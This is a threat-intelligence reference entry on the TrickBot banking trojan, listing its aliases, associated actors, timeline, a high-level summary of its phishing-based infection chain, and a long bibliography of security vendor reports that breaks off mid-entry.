SYMBOLCOMMON_NAMEaka. SYNONYMS
win.trickbot (Back to overview)

TrickBot

aka: Trickster, TheTrick, TrickLoader

Actor(s): TA505, WIZARD SPIDER

URLhaus      

A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.

- Q4 2016 - Detected in wild
Oct 2016 - 1st Report
2017 - Trickbot primarily uses Necurs as vehicle for installs.
Jan 2018 - Use XMRIG (Monero) miner
Feb 2018 - Theft Bitcoin
Mar 2018 - Unfinished ransomware module
Q3/4 2018 - Trickbot starts being spread through Emotet.

Infection Vector
1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot
2. Phish > Attached MS Office > Macro Enabled > Downloader > Trickbot
3. Phish > Attached MS Office > Macro enabled > Trickbot installed

References
2020-06-22CERT-FRCERT-FR
@techreport{certfr:20200622:volution:fba1cfa, author = {CERT-FR}, title = {{Évolution De Lactivité du Groupe Cybercriminel TA505}}, date = {2020-06-22}, institution = {CERT-FR}, url = {https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf}, language = {French}, urldate = {2020-06-24} } Évolution De Lactivité du Groupe Cybercriminel TA505
Amadey AndroMut Bart Clop Dridex FlawedGrace Gandcrab Get2 GlobeImposter Jaff Locky Marap Philadephia Ransom QuantLoader Scarab Ransomware SDBbot ServHelper Silence tRat TrickBot
2020-06-22Sentinel LABSJoshua Platt, Jason Reaves
@online{platt:20200622:inside:b381dd5, author = {Joshua Platt and Jason Reaves}, title = {{Inside a TrickBot Cobalt Strike Attack Server}}, date = {2020-06-22}, organization = {Sentinel LABS}, url = {https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/}, language = {English}, urldate = {2020-06-23} } Inside a TrickBot Cobalt Strike Attack Server
Cobalt Strike TrickBot
2020-06-17Youtube (Red Canary)Erika Noerenberg, Matt Graeber, Adam Pennington, David Kaplan
@online{noerenberg:20200617:attck:934d73c, author = {Erika Noerenberg and Matt Graeber and Adam Pennington and David Kaplan}, title = {{ATT&CK® Deep Dive: Process Injection}}, date = {2020-06-17}, organization = {Youtube (Red Canary)}, url = {https://redcanary.com/resources/webinars/deep-dive-process-injection/}, language = {English}, urldate = {2020-06-19} } ATT&CK® Deep Dive: Process Injection
ISFB Ramnit TrickBot
2020-06-15FortinetVal Saengphaibul, Fred Gutierrez
@online{saengphaibul:20200615:global:5c4be18, author = {Val Saengphaibul and Fred Gutierrez}, title = {{Global Malicious Spam Campaign Using Black Lives Matter as a Lure}}, date = {2020-06-15}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure}, language = {English}, urldate = {2020-06-16} } Global Malicious Spam Campaign Using Black Lives Matter as a Lure
TrickBot
2020-06-12HornetsecuritySecurity Lab
@online{lab:20200612:trickbot:2bf54ef, author = {Security Lab}, title = {{Trickbot Malspam Leveraging Black Lives Matter as Lure}}, date = {2020-06-12}, organization = {Hornetsecurity}, url = {https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/}, language = {English}, urldate = {2020-07-01} } Trickbot Malspam Leveraging Black Lives Matter as Lure
TrickBot
2020-06-11CofenseJason Meurer
@online{meurer:20200611:all:cc2e167, author = {Jason Meurer}, title = {{All You Need Is Text: Second Wave}}, date = {2020-06-11}, organization = {Cofense}, url = {https://cofenselabs.com/all-you-need-is-text-second-wave/}, language = {English}, urldate = {2020-06-12} } All You Need Is Text: Second Wave
TrickBot
2020-06-02Lastline LabsJames Haughom, Stefano Ortolani
@online{haughom:20200602:evolution:3286d87, author = {James Haughom and Stefano Ortolani}, title = {{Evolution of Excel 4.0 Macro Weaponization}}, date = {2020-06-02}, organization = {Lastline Labs}, url = {https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/}, language = {English}, urldate = {2020-06-03} } Evolution of Excel 4.0 Macro Weaponization
Agent Tesla DanaBot ISFB TrickBot Zloader
2020-05-28Palo Alto Networks Unit 42Brad Duncan
@online{duncan:20200528:goodbye:87a0245, author = {Brad Duncan}, title = {{Goodbye Mworm, Hello Nworm: TrickBot Updates Propagation Module}}, date = {2020-05-28}, organization = {Palo Alto Networks Unit 42}, url = {https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/}, language = {English}, urldate = {2020-05-29} } Goodbye Mworm, Hello Nworm: TrickBot Updates Propagation Module
TrickBot
2020-05-21Intel 471Intel 471
@online{471:20200521:brief:048d164, author = {Intel 471}, title = {{A brief history of TA505}}, date = {2020-05-21}, organization = {Intel 471}, url = {https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/}, language = {English}, urldate = {2020-05-23} } A brief history of TA505
AndroMut Bart Dridex FlawedAmmyy FlawedGrace Gandcrab Get2 GlobeImposter Jaff Kegotip Locky Necurs Philadephia Ransom Pony QuantLoader Rockloader SDBbot ServHelper Shifu Snatch TrickBot
2020-05-19AlienLabsOfer Caspi
@online{caspi:20200519:trickbot:50c2a51, author = {Ofer Caspi}, title = {{TrickBot BazarLoader In-Depth}}, date = {2020-05-19}, organization = {AlienLabs}, url = {https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth}, language = {English}, urldate = {2020-05-20} } TrickBot BazarLoader In-Depth
Anchor BazarBackdoor TrickBot
2020-05-14SentinelOneJason Reaves
@online{reaves:20200514:deep:1ee83b6, author = {Jason Reaves}, title = {{Deep Dive Into TrickBot Executor Module “mexec”: Reversing the Dropper Variant}}, date = {2020-05-14}, organization = {SentinelOne}, url = {https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/}, language = {English}, urldate = {2020-05-18} } Deep Dive Into TrickBot Executor Module “mexec”: Reversing the Dropper Variant
TrickBot
2020-04-14Intel 471Intel 471
@online{471:20200414:understanding:ca95961, author = {Intel 471}, title = {{Understanding the relationship between Emotet, Ryuk and TrickBot}}, date = {2020-04-14}, organization = {Intel 471}, url = {https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/}, language = {English}, urldate = {2020-04-26} } Understanding the relationship between Emotet, Ryuk and TrickBot
Emotet Ryuk TrickBot
2020-04-09ZscalerAtinderpal Singh, Abhay Yadav
@online{singh:20200409:trickbot:9db52c2, author = {Atinderpal Singh and Abhay Yadav}, title = {{TrickBot Emerges with a Few New Tricks}}, date = {2020-04-09}, organization = {Zscaler}, url = {https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks}, language = {English}, urldate = {2020-07-01} } TrickBot Emerges with a Few New Tricks
TrickBot
2020-04-08SentinelOneJason Reaves
@online{reaves:20200408:deep:87b83bb, author = {Jason Reaves}, title = {{Deep Dive Into TrickBot Executor Module “mexec”: Hidden “Anchor” Bot Nexus Operations}}, date = {2020-04-08}, organization = {SentinelOne}, url = {https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/}, language = {English}, urldate = {2020-04-13} } Deep Dive Into TrickBot Executor Module “mexec”: Hidden “Anchor” Bot Nexus Operations
Anchor TrickBot
2020-04-07SecurityIntelligenceOle Villadsen
@online{villadsen:20200407:itg08:b0b782d, author = {Ole Villadsen}, title = {{ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework}}, date = {2020-04-07}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/}, language = {English}, urldate = {2020-04-13} } ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework
More_eggs Anchor TrickBot
2020-03-31FireEyeVan Ta, Aaron Stephens
@online{ta:20200331:its:632dfca, author = {Van Ta and Aaron Stephens}, title = {{It’s Your Money and They Want It Now - The Cycle of Adversary Pursuit}}, date = {2020-03-31}, organization = {FireEye}, url = {https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html}, language = {English}, urldate = {2020-04-06} } It’s Your Money and They Want It Now - The Cycle of Adversary Pursuit
Ryuk TrickBot
2020-03-31Cisco TalosChris Neal
@online{neal:20200331:trickbot:dcf5314, author = {Chris Neal}, title = {{Trickbot: A primer}}, date = {2020-03-31}, organization = {Cisco Talos}, url = {https://blog.talosintelligence.com/2020/03/trickbot-primer.html}, language = {English}, urldate = {2020-04-01} } Trickbot: A primer
TrickBot
2020-03-30IntezerMichael Kajiloti
@online{kajiloti:20200330:fantastic:c01db60, author = {Michael Kajiloti}, title = {{Fantastic payloads and where we find them}}, date = {2020-03-30}, organization = {Intezer}, url = {https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them}, language = {English}, urldate = {2020-04-07} } Fantastic payloads and where we find them
Dridex Emotet ISFB TrickBot
2020-03-25Wilbur SecurityJW
@online{jw:20200325:trickbot:17b0dc3, author = {JW}, title = {{Trickbot to Ryuk in Two Hours}}, date = {2020-03-25}, organization = {Wilbur Security}, url = {https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/}, language = {English}, urldate = {2020-03-26} } Trickbot to Ryuk in Two Hours
Cobalt Strike Ryuk TrickBot
2020-03-18BitdefenderLiviu Arsene, Radu Tudorica, Alexandru Maximciuc, Cristina Vatamanu
@techreport{arsene:20200318:new:2d895da, author = {Liviu Arsene and Radu Tudorica and Alexandru Maximciuc and Cristina Vatamanu}, title = {{New TrickBot Module Bruteforces RDP Connections, Targets Select Telecommunication Services in US and Hong Kong}}, date = {2020-03-18}, institution = {Bitdefender}, url = {https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf}, language = {English}, urldate = {2020-03-19} } New TrickBot Module Bruteforces RDP Connections, Targets Select Telecommunication Services in US and Hong Kong
TrickBot
2020-03-09FortinetXiaopeng Zhang
@online{zhang:20200309:new:ff60491, author = {Xiaopeng Zhang}, title = {{New Variant of TrickBot Being Spread by Word Document}}, date = {2020-03-09}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html}, language = {English}, urldate = {2020-04-26} } New Variant of TrickBot Being Spread by Word Document
TrickBot
2020-03-05MicrosoftMicrosoft Threat Protection Intelligence Team
@online{team:20200305:humanoperated:d90a28e, author = {Microsoft Threat Protection Intelligence Team}, title = {{Human-operated ransomware attacks: A preventable disaster}}, date = {2020-03-05}, organization = {Microsoft}, url = {https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/}, language = {English}, urldate = {2020-03-06} } Human-operated ransomware attacks: A preventable disaster
Dharma DoppelPaymer Dridex EternalPetya Gandcrab Hermes LockerGoga MegaCortex MimiKatz REvil RobinHood Ryuk SamSam TrickBot WannaCryptor
2020-03-04CrowdStrikeCrowdStrike
@techreport{crowdstrike:20200304:2020:818c85f, author = {CrowdStrike}, title = {{2020 CrowdStrike Global Threat Report}}, date = {2020-03-04}, institution = {CrowdStrike}, url = {https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf}, language = {English}, urldate = {2020-03-04} } 2020 CrowdStrike Global Threat Report
MESSAGETAP More_eggs 8.t Dropper Anchor BabyShark BadNews Clop Cobalt Strike CobInt Cobra Carbon System Cutwail DanaBot Dharma DoppelPaymer Dridex Emotet FlawedAmmyy FriedEx Gandcrab Get2 IcedID ISFB KerrDown LightNeuron LockerGoga Maze Necurs Nokki Outlook Backdoor Phobos Ransomware Predator The Thief QakBot REvil RobinHood Ryuk SDBbot Skipper SmokeLoader TerraRecon TerraStealer TerraTV TinyLoader TrickBot vidar Winnti ANTHROPOID SPIDER Anunak APT39 BlackTech BuhTrap Charming Kitten CLOCKWORD SPIDER DOPPEL SPIDER Gamaredon Group Judgment Panda Leviathan MONTY SPIDER Mustang Panda NARWHAL SPIDER NOCTURNAL SPIDER Pinchy Spider Pirate Panda Salty Spider SCULLY SPIDER SMOKY SPIDER Thrip VENOM SPIDER
2020-03-04Bleeping ComputerLawrence Abrams
@online{abrams:20200304:ryuk:31f2ce0, author = {Lawrence Abrams}, title = {{Ryuk Ransomware Attacked Epiq Global Via TrickBot Infection}}, date = {2020-03-04}, organization = {Bleeping Computer}, url = {https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/}, language = {English}, urldate = {2020-03-09} } Ryuk Ransomware Attacked Epiq Global Via TrickBot Infection
Ryuk TrickBot
2020-03-03PWC UKPWC UK
@techreport{uk:20200303:cyber:1f1eef0, author = {PWC UK}, title = {{Cyber Threats 2019:A Year in Retrospect}}, date = {2020-03-03}, institution = {PWC UK}, url = {https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf}, language = {English}, urldate = {2020-03-03} } Cyber Threats 2019:A Year in Retrospect
KevDroid MESSAGETAP magecart AndroMut Cobalt Strike CobInt Crimson RAT DNSpionage Dridex Dtrack Emotet FlawedAmmyy FlawedGrace FriedEx Gandcrab Get2 GlobeImposter Grateful POS ISFB Kazuar LockerGoga Nokki QakBot Ramnit REvil Rifdoor RokRAT Ryuk shadowhammer ShadowPad Shifu Skipper StoneDrill Stuxnet TrickBot Winnti ZeroCleare
2020-02-28MorphisecMichael Gorelik
@online{gorelik:20200228:trickbot:678683b, author = {Michael Gorelik}, title = {{Trickbot Delivery Method Gets a New Upgrade Focusing on Windows 10}}, date = {2020-02-28}, organization = {Morphisec}, url = {https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows}, language = {English}, urldate = {2020-03-03} } Trickbot Delivery Method Gets a New Upgrade Focusing on Windows 10
TrickBot
2020-02-26SentinelOneJason Reaves
@online{reaves:20200226:revealing:2c3fc63, author = {Jason Reaves}, title = {{Revealing the Trick | A Deep Dive into TrickLoader Obfuscation}}, date = {2020-02-26}, organization = {SentinelOne}, url = {https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/}, language = {English}, urldate = {2020-02-27} } Revealing the Trick | A Deep Dive into TrickLoader Obfuscation
TrickBot
2020-02-19FireEyeFireEye
@online{fireeye:20200219:mtrends:193613a, author = {FireEye}, title = {{M-Trends 2020}}, date = {2020-02-19}, organization = {FireEye}, url = {https://content.fireeye.com/m-trends/rpt-m-trends-2020}, language = {English}, urldate = {2020-02-20} } M-Trends 2020
Cobalt Strike Grateful POS LockerGoga QakBot TrickBot
2020-02-18Sophos LabsLuca Nagy
@online{nagy:20200218:nearly:8ff363f, author = {Luca Nagy}, title = {{Nearly a quarter of malware now communicates using TLS}}, date = {2020-02-18}, organization = {Sophos Labs}, url = {https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/}, language = {English}, urldate = {2020-02-27} } Nearly a quarter of malware now communicates using TLS
Dridex IcedID TrickBot
2020-02-13QianxinQi Anxin Threat Intelligence Center
@techreport{center:20200213:report:146d333, author = {Qi Anxin Threat Intelligence Center}, title = {{APT Report 2019}}, date = {2020-02-13}, institution = {Qianxin}, url = {https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf}, language = {English}, urldate = {2020-02-27} } APT Report 2019
Chrysaor Exodus Dacls elf.vpnfilter DNSRat Griffon KopiLuwak More_eggs SQLRat AppleJeus BONDUPDATER Agent.BTZ Anchor AndroMut AppleJeus BOOSTWRITE Brambul Carbanak Cobalt Strike Dacls DistTrack DNSpionage Dtrack ELECTRICFISH FlawedAmmyy FlawedGrace Get2 Grateful POS HOPLIGHT Imminent Monitor RAT jason Joanap KerrDown KEYMARBLE Lambert LightNeuron LoJax MiniDuke PolyglotDuke PowerRatankba Rising Sun SDBbot ServHelper Snatch Stuxnet TinyMet tRat TrickBot Volgmer X-Agent Zebrocy
2020-02-10MalwarebytesAdam Kujawa, Wendy Zamora, Jérôme Segura, Thomas Reed, Nathan Collier, Jovi Umawing, Chris Boyd, Pieter Arntz, David Ruiz
@techreport{kujawa:20200210:2020:3fdaf12, author = {Adam Kujawa and Wendy Zamora and Jérôme Segura and Thomas Reed and Nathan Collier and Jovi Umawing and Chris Boyd and Pieter Arntz and David Ruiz}, title = {{2020 State of Malware Report}}, date = {2020-02-10}, institution = {Malwarebytes}, url = {https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf}, language = {English}, urldate = {2020-02-13} } 2020 State of Malware Report
magecart Emotet QakBot REvil Ryuk TrickBot WannaCryptor
2020-01-30MorphisecArnold Osipov
@online{osipov:20200130:trickbot:da5c80d, author = {Arnold Osipov}, title = {{Trickbot Trojan Leveraging a New Windows 10 UAC Bypass}}, date = {2020-01-30}, organization = {Morphisec}, url = {https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass}, language = {English}, urldate = {2020-02-03} } Trickbot Trojan Leveraging a New Windows 10 UAC Bypass
TrickBot
2020-01-30Bleeping ComputerLawrence Abrams
@online{abrams:20200130:trickbot:22db786, author = {Lawrence Abrams}, title = {{TrickBot Uses a New Windows 10 UAC Bypass to Launch Quietly}}, date = {2020-01-30}, organization = {Bleeping Computer}, url = {https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly/}, language = {English}, urldate = {2020-02-03} } TrickBot Uses a New Windows 10 UAC Bypass to Launch Quietly
TrickBot
2020-01-29Bleeping ComputerLawrence Abrams
@online{abrams:20200129:malware:920dc7e, author = {Lawrence Abrams}, title = {{Malware Tries to Trump Security Software With POTUS Impeachment}}, date = {2020-01-29}, organization = {Bleeping Computer}, url = {https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/}, language = {English}, urldate = {2020-02-03} } Malware Tries to Trump Security Software With POTUS Impeachment
TrickBot
2020-01-27T-SystemsT-Systems
@techreport{tsystems:20200127:vorlufiger:39dc989, author = {T-Systems}, title = {{Vorläufiger forensischer Abschlussbericht zur Untersuchung des Incidents beim Berliner Kammergericht}}, date = {2020-01-27}, institution = {T-Systems}, url = {https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf}, language = {German}, urldate = {2020-01-28} } Vorläufiger forensischer Abschlussbericht zur Untersuchung des Incidents beim Berliner Kammergericht
Emotet TrickBot
2020-01-23Bleeping ComputerLawrence Abrams
@online{abrams:20200123:trickbot:5ca7827, author = {Lawrence Abrams}, title = {{TrickBot Now Steals Windows Active Directory Credentials}}, date = {2020-01-23}, organization = {Bleeping Computer}, url = {https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/}, language = {English}, urldate = {2020-01-27} } TrickBot Now Steals Windows Active Directory Credentials
TrickBot
2020-01-17Ken Sajo, Yasuhiro Takeda, Yusuke Niwa
@techreport{sajo:20200117:battle:2b146f5, author = {Ken Sajo and Yasuhiro Takeda and Yusuke Niwa}, title = {{Battle Against Ursnif Malspam Campaign targeting Japan}}, date = {2020-01-17}, institution = {}, url = {https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf}, language = {English}, urldate = {2020-01-17} } Battle Against Ursnif Malspam Campaign targeting Japan
Cutwail ISFB TrickBot UrlZone
2020-01-16Bleeping ComputerLawrence Abrams
@online{abrams:20200116:trickbot:ed6fdb3, author = {Lawrence Abrams}, title = {{TrickBot Now Uses a Windows 10 UAC Bypass to Evade Detection}}, date = {2020-01-16}, organization = {Bleeping Computer}, url = {https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/}, language = {English}, urldate = {2020-01-20} } TrickBot Now Uses a Windows 10 UAC Bypass to Evade Detection
TrickBot
2020-01-10CSISCSIS
@techreport{csis:20200110:threat:7454f36, author = {CSIS}, title = {{Threat Matrix H1 2019}}, date = {2020-01-10}, institution = {CSIS}, url = {https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf}, language = {English}, urldate = {2020-01-22} } Threat Matrix H1 2019
Gustuff magecart Emotet Gandcrab Ramnit TrickBot
2020-01-09SentinelOneVitali Kremez, Joshua Platt, Jason Reaves
@online{kremez:20200109:toptier:4f8de90, author = {Vitali Kremez and Joshua Platt and Jason Reaves}, title = {{Top-Tier Russian Organized Cybercrime Group Unveils Fileless Stealthy “PowerTrick” Backdoor for High-Value Targets}}, date = {2020-01-09}, organization = {SentinelOne}, url = {https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/}, language = {English}, urldate = {2020-01-13} } Top-Tier Russian Organized Cybercrime Group Unveils Fileless Stealthy “PowerTrick” Backdoor for High-Value Targets
TrickBot WIZARD SPIDER
2020SecureworksSecureWorks
@online{secureworks:2020:gold:d8faa3e, author = {SecureWorks}, title = {{GOLD ULRICK}}, date = {2020}, organization = {Secureworks}, url = {https://www.secureworks.com/research/threat-profiles/gold-ulrick}, language = {English}, urldate = {2020-05-23} } GOLD ULRICK
Empire Downloader Ryuk TrickBot WIZARD SPIDER
2020SecureworksSecureWorks
@online{secureworks:2020:gold:65fcc96, author = {SecureWorks}, title = {{GOLD SWATHMORE}}, date = {2020}, organization = {Secureworks}, url = {https://www.secureworks.com/research/threat-profiles/gold-swathmore}, language = {English}, urldate = {2020-05-23} } GOLD SWATHMORE
GlobeImposter Gozi IcedID TrickBot Lunar Spider
2020SecureworksSecureWorks
@online{secureworks:2020:gold:21c4d39, author = {SecureWorks}, title = {{GOLD BLACKBURN}}, date = {2020}, organization = {Secureworks}, url = {https://www.secureworks.com/research/threat-profiles/gold-blackburn}, language = {English}, urldate = {2020-05-23} } GOLD BLACKBURN
Dyre TrickBot
2019-12-12FireEyeChi-en Shen, Oleg Bondarenko
@online{shen:20191212:cyber:e01baca, author = {Chi-en Shen and Oleg Bondarenko}, title = {{Cyber Threat Landscape in Japan – Revealing Threat in the Shadow}}, date = {2019-12-12}, organization = {FireEye}, url = {https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko}, language = {English}, urldate = {2020-04-16} } Cyber Threat Landscape in Japan – Revealing Threat in the Shadow
Cerberus TSCookie Cobalt Strike Dtrack Emotet Formbook IcedID Icefog IRONHALO Loki Password Stealer (PWS) PandaBanker PLEAD poisonplug TrickBot BlackTech
2019-12-09Palo Alto Networks Unit 42Bryan Lee, Brittany Ash, Mike Harbison
@online{lee:20191209:trickbot:48d9da3, author = {Bryan Lee and Brittany Ash and Mike Harbison}, title = {{TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks}}, date = {2019-12-09}, organization = {Palo Alto Networks Unit 42}, url = {https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/}, language = {English}, urldate = {2020-01-22} } TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
TrickBot
2019-11-22Palo Alto Networks Unit 42Brad Duncan
@online{duncan:20191122:trickbot:e14933b, author = {Brad Duncan}, title = {{Trickbot Updates Password Grabber Module}}, date = {2019-11-22}, organization = {Palo Alto Networks Unit 42}, url = {https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/}, language = {English}, urldate = {2020-01-22} } Trickbot Updates Password Grabber Module
TrickBot
2019-11-13CrowdStrikeJen Ayers, Jason Rivera
@techreport{ayers:20191113:through:70cc3b3, author = {Jen Ayers and Jason Rivera}, title = {{Through the Eyes of the Adversary}}, date = {2019-11-13}, institution = {CrowdStrike}, url = {https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf}, language = {English}, urldate = {2020-03-22} } Through the Eyes of the Adversary
TrickBot CLOCKWORD SPIDER
2019-11-08Palo Alto Networks Unit 42Brad Duncan
@online{duncan:20191108:wireshark:f37b983, author = {Brad Duncan}, title = {{Wireshark Tutorial: Examining Trickbot Infections}}, date = {2019-11-08}, organization = {Palo Alto Networks Unit 42}, url = {https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/}, language = {English}, urldate = {2020-01-06} } Wireshark Tutorial: Examining Trickbot Infections
TrickBot
2019-11-06Heise SecurityThomas Hungenberg
@online{hungenberg:20191106:emotet:1605954, author = {Thomas Hungenberg}, title = {{Emotet, Trickbot, Ryuk – ein explosiver Malware-Cocktail}}, date = {2019-11-06}, organization = {Heise Security}, url = {https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html}, language = {German}, urldate = {2020-01-06} } Emotet, Trickbot, Ryuk – ein explosiver Malware-Cocktail
Emotet Ryuk TrickBot
2019-10-29SneakyMonkey BlogSneakyMonkey
@online{sneakymonkey:20191029:trickbot:bd7249c, author = {SneakyMonkey}, title = {{TRICKBOT - Analysis Part II}}, date = {2019-10-29}, organization = {SneakyMonkey Blog}, url = {https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/}, language = {English}, urldate = {2019-12-17} } TRICKBOT - Analysis Part II
TrickBot
2019-09-25GovCERT.chGovCERT.ch
@online{govcertch:20190925:trickbot:8346dd7, author = {GovCERT.ch}, title = {{Trickbot - An analysis of data collected from the botnet}}, date = {2019-09-25}, organization = {GovCERT.ch}, url = {https://www.govcert.ch/blog/37/trickbot-an-analysis-of-data-collected-from-the-botnet}, language = {English}, urldate = {2020-01-08} } Trickbot - An analysis of data collected from the botnet
TrickBot
2019-08-27SecureworksCTU Research Team
@online{team:20190827:trickbot:fa5f95b, author = {CTU Research Team}, title = {{TrickBot Modifications Target U.S. Mobile Users}}, date = {2019-08-27}, organization = {Secureworks}, url = {https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users}, language = {English}, urldate = {2020-01-09} } TrickBot Modifications Target U.S. Mobile Users
TrickBot
2019-08-26InQuestJosiah Smith
@online{smith:20190826:memory:c4cea9b, author = {Josiah Smith}, title = {{Memory Analysis of TrickBot}}, date = {2019-08-26}, organization = {InQuest}, url = {https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis}, language = {English}, urldate = {2020-01-10} } Memory Analysis of TrickBot
TrickBot
2019-08-05Trend MicroNoel Anthony Llimos, Michael Jhon Ofiaza
@online{llimos:20190805:latest:62ba94b, author = {Noel Anthony Llimos and Michael Jhon Ofiaza}, title = {{Latest Trickbot Campaign Delivered via Highly Obfuscated JS File}}, date = {2019-08-05}, organization = {Trend Micro}, url = {https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/}, language = {English}, urldate = {2020-01-23} } Latest Trickbot Campaign Delivered via Highly Obfuscated JS File
ostap TrickBot
2019-07-11NTT SecurityNTT Security
@online{security:20190711:targeted:a48e692, author = {NTT Security}, title = {{Targeted TrickBot activity drops 'PowerBrace' backdoor}}, date = {2019-07-11}, organization = {NTT Security}, url = {https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor}, language = {English}, urldate = {2019-12-18} } Targeted TrickBot activity drops 'PowerBrace' backdoor
PowerBrace TrickBot
2019-06-04SlideShareVitali Kremez
@online{kremez:20190604:inside:d633c6f, author = {Vitali Kremez}, title = {{Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vitali Kremez}}, date = {2019-06-04}, organization = {SlideShare}, url = {https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez}, language = {English}, urldate = {2020-01-13} } Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vitali Kremez
TrickBot
2019-05-22sneakymonk3y (Mark)
@online{mark:20190522:trickbot:277256b, author = {sneakymonk3y (Mark)}, title = {{TRICKBOT - Analysis}}, date = {2019-05-22}, url = {https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/}, language = {English}, urldate = {2020-01-06} } TRICKBOT - Analysis
TrickBot
2019-05-09GovCERT.chGovCERT.ch
@online{govcertch:20190509:severe:2767782, author = {GovCERT.ch}, title = {{Severe Ransomware Attacks Against Swiss SMEs}}, date = {2019-05-09}, organization = {GovCERT.ch}, url = {https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes}, language = {English}, urldate = {2019-07-11} } Severe Ransomware Attacks Against Swiss SMEs
Emotet LockerGoga Ryuk TrickBot
2019-05-02CERT.PLMichał Praszmo
@online{praszmo:20190502:detricking:43a7dc1, author = {Michał Praszmo}, title = {{Detricking TrickBot Loader}}, date = {2019-05-02}, organization = {CERT.PL}, url = {https://www.cert.pl/en/news/single/detricking-trickbot-loader/}, language = {English}, urldate = {2020-01-08} } Detricking TrickBot Loader
TrickBot
2019-04-05Medium vishal_thakurVishal Thakur
@online{thakur:20190405:trickbot:d1c4891, author = {Vishal Thakur}, title = {{Trickbot — a concise treatise}}, date = {2019-04-05}, organization = {Medium vishal_thakur}, url = {https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737}, language = {English}, urldate = {2020-01-13} } Trickbot — a concise treatise
TrickBot
2019-04-02CybereasonNoa Pinkas, Lior Rochberger, Matan Zatz
